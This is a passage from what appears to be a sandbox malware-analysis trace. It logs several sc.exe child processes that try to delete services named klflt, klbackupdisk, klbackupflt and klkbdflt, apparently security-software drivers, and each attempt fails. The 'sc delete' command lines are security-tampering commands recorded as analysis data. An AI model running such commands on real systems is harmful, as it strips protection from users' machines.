0x7ff67a500000 end_va = 0x7ff67a5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a500000" filename = "" Region: id = 5613 start_va = 0x7ff67a62c000 end_va = 0x7ff67a62dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a62c000" filename = "" Region: id = 5614 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5615 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5616 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5617 start_va = 0x8ac140000 end_va = 0x8ac146fff entry_point = 0x0 region_type = private name = "private_0x00000008ac140000" filename = "" Region: id = 5618 start_va = 0x8ac2e0000 end_va = 0x8ac3befff entry_point = 0x8ac2e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5619 start_va = 0x8ac150000 end_va = 0x8ac161fff entry_point = 0x8ac150000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 87 os_tid = 0xdb0 [0080.191] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.192] __set_app_type (_Type=0x1) [0080.192] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.192] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.192] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.244] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.244] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.244] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.244] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.245] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.245] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.245] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.245] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.245] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.245] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.245] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.245] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.245] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.245] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.245] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.245] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.245] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.245] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.245] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.245] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.245] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.245] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.245] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.247] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x8ac1e8d70 [0080.251] OpenServiceW (hSCManager=0x8ac1e8d70, lpServiceName="klflt", dwDesiredAccess=0x10000) returned 0x0 [0080.252] GetLastError () returned 0x424 [0080.252] _ultow (in: _Dest=0x424, _Radix=-1409484440 | out: _Dest=0x424) returned="1060" [0080.252] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.253] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x8abfcf920, nSize=0x2, Arguments=0x8abfcf950 | out: lpBuffer="鎰갞\x08") returned 0x62 [0080.254] GetFileType (hFile=0x24) returned 0x2 [0080.254] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x8abfcf8d0 | out: lpMode=0x8abfcf8d0) returned 1 [0080.313] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x8ac1e93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x8abfcf8c8, lpReserved=0x0 | out: lpBuffer=0x8ac1e93b0*, lpNumberOfCharsWritten=0x8abfcf8c8*=0x62) returned 1 [0080.313] LocalFree (hMem=0x8ac1e93b0) returned 0x0 [0080.313] LocalFree (hMem=0x0) returned 0x0 [0080.313] CloseServiceHandle (hSCObject=0x8ac1e8d70) returned 1 [0080.314] LocalFree (hMem=0x0) returned 0x0 [0080.314] exit (_Code=1060) Thread: id = 361 os_tid = 0x1374 Process: id = "60" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x942a000" os_pid = "0xdb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klbackupdisk\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1283 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1284 start_va = 0xa71a640000 end_va = 0xa71a65ffff entry_point = 0x0 region_type = private name = "private_0x000000a71a640000" filename = "" Region: id = 1285 start_va = 0xa71a660000 end_va = 0xa71a673fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a71a660000" filename = "" Region: id = 1286 start_va = 0xa71a680000 end_va = 0xa71a6fffff entry_point = 0x0 region_type = private name = "private_0x000000a71a680000" filename = "" Region: id = 1287 start_va = 0xa71a700000 end_va = 0xa71a703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a71a700000" filename = "" Region: id = 1288 start_va = 0xa71a710000 end_va = 0xa71a710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a71a710000" filename = "" Region: id = 1289 start_va = 0xa71a720000 end_va = 0xa71a721fff entry_point = 0x0 region_type = private name = "private_0x000000a71a720000" filename = "" Region: id = 1290 start_va = 0x7df5ff0c0000 end_va = 0x7ff5ff0bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0c0000" filename = "" Region: id = 1291 start_va = 0x7ff67a140000 end_va = 0x7ff67a162fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a140000" filename = "" Region: id = 1292 start_va = 0x7ff67a165000 end_va = 0x7ff67a165fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a165000" filename = "" Region: id = 1293 start_va = 0x7ff67a16e000 end_va = 0x7ff67a16ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a16e000" filename = "" Region: id = 1294 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1295 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1705 start_va = 0xa71a820000 end_va = 0xa71a91ffff entry_point = 0x0 region_type = private name = "private_0x000000a71a820000" filename = "" Region: id = 1706 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1707 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5629 start_va = 0xa71a640000 end_va = 0xa71a64ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a71a640000" filename = "" Region: id = 5630 start_va = 0xa71a650000 end_va = 0xa71a656fff entry_point = 0x0 region_type = private name = "private_0x000000a71a650000" filename = "" Region: id = 5631 start_va = 0xa71a730000 end_va = 0xa71a7edfff entry_point = 0xa71a730000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5632 start_va = 0xa71a920000 end_va = 0xa71a99ffff entry_point = 0x0 region_type = private name = "private_0x000000a71a920000" filename = "" Region: id = 5633 start_va = 0xa71aa50000 end_va = 0xa71aa5ffff entry_point = 0x0 region_type = private name = "private_0x000000a71aa50000" filename = "" Region: id = 5634 start_va = 0x7ff67a040000 end_va = 0x7ff67a13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a040000" filename = "" Region: id = 5635 start_va = 0x7ff67a16c000 end_va = 0x7ff67a16dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a16c000" filename = "" Region: id = 5636 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5637 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5642 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5643 start_va = 0xa71a7f0000 end_va = 0xa71a7f6fff entry_point = 0x0 region_type = private name = "private_0x000000a71a7f0000" filename = "" Region: id = 5644 start_va = 0xa71aa60000 end_va = 0xa71ab3efff entry_point = 0xa71aa60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5645 start_va = 0xa71a800000 end_va = 0xa71a811fff entry_point = 0xa71a800000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 88 os_tid = 0xdb8 [0080.337] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.337] __set_app_type (_Type=0x1) [0080.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.337] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.337] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.361] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.361] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.361] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.361] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.361] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.361] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.361] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.361] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.361] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.361] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.361] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.362] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.362] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.362] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.362] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.362] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.362] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.362] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.362] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.362] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.362] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.362] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.362] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.362] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.363] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xa71a828b00 [0080.368] OpenServiceW (hSCManager=0xa71a828b00, lpServiceName="klbackupdisk", dwDesiredAccess=0x10000) returned 0x0 [0080.368] GetLastError () returned 0x424 [0080.368] _ultow (in: _Dest=0x424, _Radix=443546760 | out: _Dest=0x424) returned="1060" [0080.368] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.369] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xa71a6ffc40, nSize=0x2, Arguments=0xa71a6ffc70 | out: lpBuffer="頰᪂§") returned 0x62 [0080.370] GetFileType (hFile=0x24) returned 0x2 [0080.370] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xa71a6ffbf0 | out: lpMode=0xa71a6ffbf0) returned 1 [0080.375] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xa71a829830*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xa71a6ffbe8, lpReserved=0x0 | out: lpBuffer=0xa71a829830*, lpNumberOfCharsWritten=0xa71a6ffbe8*=0x62) returned 1 [0080.375] LocalFree (hMem=0xa71a829830) returned 0x0 [0080.375] LocalFree (hMem=0x0) returned 0x0 [0080.375] CloseServiceHandle (hSCObject=0xa71a828b00) returned 1 [0080.376] LocalFree (hMem=0x0) returned 0x0 [0080.376] exit (_Code=1060) Thread: id = 363 os_tid = 0x137c Process: id = "61" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xef6f000" os_pid = "0xdbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klbackupflt\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1297 start_va = 0x2f91e30000 end_va = 0x2f91e4ffff entry_point = 0x0 region_type = private name = "private_0x0000002f91e30000" filename = "" Region: id = 1298 start_va = 0x2f91e50000 end_va = 0x2f91e63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002f91e50000" filename = "" Region: id = 1299 start_va = 0x2f91e70000 end_va = 0x2f91eeffff entry_point = 0x0 region_type = private name = "private_0x0000002f91e70000" filename = "" Region: id = 1300 start_va = 0x2f91ef0000 end_va = 0x2f91ef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002f91ef0000" filename = "" Region: id = 1301 start_va = 0x2f91f00000 end_va = 0x2f91f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002f91f00000" filename = "" Region: id = 1302 start_va = 0x2f91f10000 end_va = 0x2f91f11fff entry_point = 0x0 region_type = private name = "private_0x0000002f91f10000" filename = "" Region: id = 1303 start_va = 0x7df5ffbd0000 end_va = 0x7ff5ffbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbd0000" filename = "" Region: id = 1304 start_va = 0x7ff679f80000 end_va = 0x7ff679fa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679f80000" filename = "" Region: id = 1305 start_va = 0x7ff679fad000 end_va = 0x7ff679faefff entry_point = 0x0 region_type = private name = "private_0x00007ff679fad000" filename = "" Region: id = 1306 start_va = 0x7ff679faf000 end_va = 0x7ff679faffff entry_point = 0x0 region_type = private name = "private_0x00007ff679faf000" filename = "" Region: id = 1307 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1308 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1708 start_va = 0x2f91fe0000 end_va = 0x2f920dffff entry_point = 0x0 region_type = private name = "private_0x0000002f91fe0000" filename = "" Region: id = 1709 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1710 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5238 start_va = 0x2f91e30000 end_va = 0x2f91e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002f91e30000" filename = "" Region: id = 5239 start_va = 0x2f91e40000 end_va = 0x2f91e46fff entry_point = 0x0 region_type = private name = "private_0x0000002f91e40000" filename = "" Region: id = 5240 start_va = 0x2f91f20000 end_va = 0x2f91fddfff entry_point = 0x2f91f20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5241 start_va = 0x2f920e0000 end_va = 0x2f9215ffff entry_point = 0x0 region_type = private name = "private_0x0000002f920e0000" filename = "" Region: id = 5242 start_va = 0x2f92180000 end_va = 0x2f9218ffff entry_point = 0x0 region_type = private name = "private_0x0000002f92180000" filename = "" Region: id = 5243 start_va = 0x7ff679e80000 end_va = 0x7ff679f7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679e80000" filename = "" Region: id = 5244 start_va = 0x7ff679fab000 end_va = 0x7ff679facfff entry_point = 0x0 region_type = private name = "private_0x00007ff679fab000" filename = "" Region: id = 5245 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5246 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5247 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5248 start_va = 0x2f92160000 end_va = 0x2f92166fff entry_point = 0x0 region_type = private name = "private_0x0000002f92160000" filename = "" Region: id = 5249 start_va = 0x2f92190000 end_va = 0x2f9226efff entry_point = 0x2f92190000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5250 start_va = 0x2f92270000 end_va = 0x2f92281fff entry_point = 0x2f92270000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 89 os_tid = 0xdc0 [0077.671] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.671] __set_app_type (_Type=0x1) [0077.671] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.672] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.672] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.715] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.715] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.715] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.715] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.715] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.715] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.715] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.715] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.715] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.715] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.715] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.715] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.715] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.715] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.715] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.716] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.716] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.716] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.716] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.716] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.716] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.716] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.716] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.716] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.716] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.717] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2f91fe8b30 [0077.722] OpenServiceW (hSCManager=0x2f91fe8b30, lpServiceName="klbackupflt", dwDesiredAccess=0x10000) returned 0x0 [0077.722] GetLastError () returned 0x424 [0077.722] _ultow (in: _Dest=0x424, _Radix=-1846608776 | out: _Dest=0x424) returned="1060" [0077.722] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.724] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2f91eefc30, nSize=0x2, Arguments=0x2f91eefc60 | out: lpBuffer="鎰釾/") returned 0x62 [0077.724] GetFileType (hFile=0x24) returned 0x2 [0077.724] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x2f91eefbe0 | out: lpMode=0x2f91eefbe0) returned 1 [0077.734] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x2f91fe93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2f91eefbd8, lpReserved=0x0 | out: lpBuffer=0x2f91fe93b0*, lpNumberOfCharsWritten=0x2f91eefbd8*=0x62) returned 1 [0077.735] LocalFree (hMem=0x2f91fe93b0) returned 0x0 [0077.735] LocalFree (hMem=0x0) returned 0x0 [0077.735] CloseServiceHandle (hSCObject=0x2f91fe8b30) returned 1 [0077.735] LocalFree (hMem=0x0) returned 0x0 [0077.735] exit (_Code=1060) Thread: id = 332 os_tid = 0x12dc Process: id = "62" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf074000" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"klkbdflt\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 